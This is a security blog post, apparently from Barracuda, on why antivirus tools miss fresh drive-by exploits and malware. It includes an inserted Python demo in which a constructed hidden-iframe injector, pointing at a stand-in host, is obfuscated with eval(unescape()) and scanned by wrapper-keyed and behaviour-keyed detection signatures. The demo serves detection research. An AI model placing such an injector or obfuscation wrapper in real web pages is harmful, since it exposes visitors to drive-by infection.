Despite advances in technology that improve the detection efficacy of antivirus (AV) software, identification rates for freshly generated threat artifacts remain low. As an example, consider the VirusTotal results for malware served this week by drive-by downloads originating from Indowebster[.]com, an Alexa top-ranked website that has appeared regularly in Threatglass over the last several months. In those results, only 8 of 54 tools identify the executable as malicious, and the many false negatives include the offerings of several popular AV vendors.
Come for a Drive-by Download, Stay for a Microcosm of a Long-standing Issue
Unfortunately, detection results for the exploit content that led to the retrieval of the malware executable are no better: again, only 8 of 54 tools identify the exploit as malicious. Worse, the deobfuscated version of the exploit draws fewer detections than the obfuscated one. That inversion is a sign that many of the signatures and heuristics match the obfuscation wrapper rather than the underlying exploit, which makes them brittle and easily circumvented: an attacker only has to change the wrapper to evade them.
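To make the inversion concrete, here is an added example (it is not code from the post, from Threatglass, or from any AV vendor) using a constructed hidden-iframe injector as a stand-in for the exploit. Two signature sets are run against the obfuscated and the deobfuscated form of the same script: one keyed on the `eval(unescape("..."))` wrapper, the other keyed on what the script does after the wrapper is stripped. The sample payload, the hostname `malware.invalid`, and the signature names are all invented for the illustration.

```python
"""Why detections can drop after deobfuscation: signatures keyed on the
obfuscation wrapper rather than on the exploit's behaviour.

Added example with constructed samples; not the exploit or the Threatglass
data discussed in the post.
"""
import re

# Constructed sample: a minimal drive-by style hidden-iframe injector.
# Stand-in for the exploit content, not that content.
DEOBFUSCATED = (
    'document.write("<iframe src=\\"http://malware.invalid/ld.php\\" '
    'width=0 height=0 style=\\"visibility:hidden\\"></iframe>");'
)


def js_escape(s: str) -> str:
    """Percent-encode every character (JavaScript escape() style for ASCII)."""
    return "".join("%%%02X" % ord(c) for c in s)


def js_unescape(s: str) -> str:
    """Decode %uXXXX and %XX sequences the way JavaScript unescape() does."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def obfuscate(js: str) -> str:
    """Wrap code in the classic eval(unescape("...")) layer."""
    return 'eval(unescape("%s"));' % js_escape(js)


EVAL_UNESCAPE = re.compile(r'eval\s*\(\s*unescape\s*\(\s*"([^"]*)"\s*\)\s*\)\s*;?')


def normalize(js: str, max_layers: int = 8) -> str:
    """Strip nested eval(unescape("...")) wrappers so a signature sees the
    code that would actually execute, not the encoding it was shipped in."""
    for _ in range(max_layers):
        m = EVAL_UNESCAPE.search(js)
        if not m:
            break
        js = js[: m.start()] + js_unescape(m.group(1)) + js[m.end():]
    return js


# Signature set A: keyed on the obfuscation wrapper. Cheap to write, and
# exactly what fails when the same exploit is submitted deobfuscated.
WRAPPER_SIGS = {
    "JS/Obfus.EvalUnescape": re.compile(r"eval\s*\(\s*unescape\s*\("),
    "JS/Obfus.PercentBlob": re.compile(r"(?:%[0-9a-fA-F]{2}){32,}"),
}

# Signature set B: keyed on behaviour (a zero-size iframe written into the
# page), applied after normalisation so it survives re-wrapping.
BEHAVIOUR_SIGS = {
    "JS/HiddenIframe": re.compile(
        r'''<iframe[^>]*\b(?:width|height)\s*=\s*\\?["']?0\b[^>]*>''', re.I
    ),
    "JS/DocWriteIframe": re.compile(r"document\.write\s*\([^)]*<iframe", re.I),
}


def scan(js: str, sigs: dict, normalize_first: bool = False) -> set:
    """Return the names of the signatures that fire on the sample."""
    text = normalize(js) if normalize_first else js
    return {name for name, rx in sigs.items() if rx.search(text)}


def demo() -> dict:
    """Run both signature sets over the obfuscated and deobfuscated forms."""
    samples = {"obfuscated": obfuscate(DEOBFUSCATED), "deobfuscated": DEOBFUSCATED}
    return {
        label: {
            "wrapper": scan(sample, WRAPPER_SIGS),
            "behaviour": scan(sample, BEHAVIOUR_SIGS, normalize_first=True),
        }
        for label, sample in samples.items()
    }


if __name__ == "__main__":
    for label, hits in demo().items():
        print(label, "wrapper:", sorted(hits["wrapper"]),
              "behaviour:", sorted(hits["behaviour"]))
```

The wrapper-keyed set fires on the obfuscated sample and goes silent on the deobfuscated one, reproducing the inversion seen in the VirusTotal results; the behaviour-keyed set fires on both because it matches after the wrapper is stripped. Note also that without `normalize_first` the behaviour set misses the obfuscated sample entirely, which is why a static signature needs an unwrapping step in front of it rather than a pattern for each wrapper.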
If past experience is any guide, detections for both the exploit and the payload should improve dramatically within a week. That turnaround is substantially better than the delays typical half a decade ago, but there is still plenty of room for improvement: even a window of a few days gives an attacker enough time to achieve a variety of objectives.
Christine Barry is Chief Blogger and Social Media Manager at Barracuda. Her work consists of writing engaging articles related to Barracuda's services and facilitating communication between the public and internal teams. Before joining Barracuda, Christine spent more than 15 years as a field engineer and project manager in education and with small and medium-sized businesses. She holds several technology certifications, a bachelor's degree from the University of Michigan, and an MBA.
Connect with Christine on LinkedIn.